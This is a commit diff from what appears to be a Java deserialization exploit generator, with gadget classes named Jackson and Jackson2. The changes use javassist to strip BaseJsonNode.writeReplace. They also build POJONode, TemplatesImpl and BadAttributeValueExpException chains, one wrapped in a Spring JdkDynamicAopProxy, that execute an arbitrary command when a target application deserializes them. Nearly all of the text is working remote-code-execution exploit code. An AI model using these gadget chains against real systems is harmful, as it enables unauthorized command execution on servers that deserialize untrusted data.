111

C3P0ooo · Jun 11, 2024 · a350115 · a350115
1 parent ff72572
commit a350115
Show file tree

Hide file tree

Showing 3 changed files with 16 additions and 75 deletions.
diff --git a/src/main/java/com/fasterxml/jackson/databind/node/BaseJsonNode.java b/src/main/java/com/fasterxml/jackson/databind/node/BaseJsonNode.java
diff --git a/src/main/java/org/gadget/Jackson.java b/src/main/java/org/gadget/Jackson.java
@@ -2,6 +2,9 @@
 
 import com.fasterxml.jackson.databind.node.POJONode;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtMethod;
 import org.gadget.inter.Gadget;
 import org.util.TemplateUtils;
 
@@ -10,6 +13,12 @@
 
 public class Jackson implements Gadget {
     public Object getObject(String common) throws Exception {
+        ClassPool pool = ClassPool.getDefault();
+        CtClass ctClass0 = pool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
+        CtMethod writeReplace = ctClass0.getDeclaredMethod("writeReplace");
+        ctClass0.removeMethod(writeReplace);
+        ctClass0.toClass();
+
         TemplatesImpl template = TemplateUtils.getTemplate(common);
         POJONode node = new POJONode(template);
         BadAttributeValueExpException val = new BadAttributeValueExpException(null);

diff --git a/src/main/java/org/gadget/Jackson2.java b/src/main/java/org/gadget/Jackson2.java
@@ -13,12 +13,12 @@
 public class Jackson2 implements Gadget {
     @Override
     public Object getObject(String command) throws Exception {
-//        ClassPool pool = ClassPool.getDefault();
-//        CtClass ctClass0 = pool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
-//        CtMethod writeReplace = ctClass0.getDeclaredMethod("writeReplace");
-//        ctClass0.removeMethod(writeReplace);
-//        ctClass0.toClass();
-        //利用 JdkDynamicAopProxy 进行封装使其稳定触发
+        ClassPool pool = ClassPool.getDefault();
+        CtClass ctClass0 = pool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
+        CtMethod writeReplace = ctClass0.getDeclaredMethod("writeReplace");
+        ctClass0.removeMethod(writeReplace);
+        ctClass0.toClass();
+//        利用 JdkDynamicAopProxy 进行封装使其稳定触发
         Class<?> clazz = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy");
         Constructor<?> cons = clazz.getDeclaredConstructor(AdvisedSupport.class);
         cons.setAccessible(true);
@@ -29,7 +29,7 @@ public Object getObject(String command) throws Exception {
         POJONode jsonNodes = new POJONode(proxyObj);
 
         BadAttributeValueExpException exp = new BadAttributeValueExpException(null);
-        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
+        Field val = exp.getClass().getDeclaredField("val");
         val.setAccessible(true);
         val.set(exp,jsonNodes);
         return exp;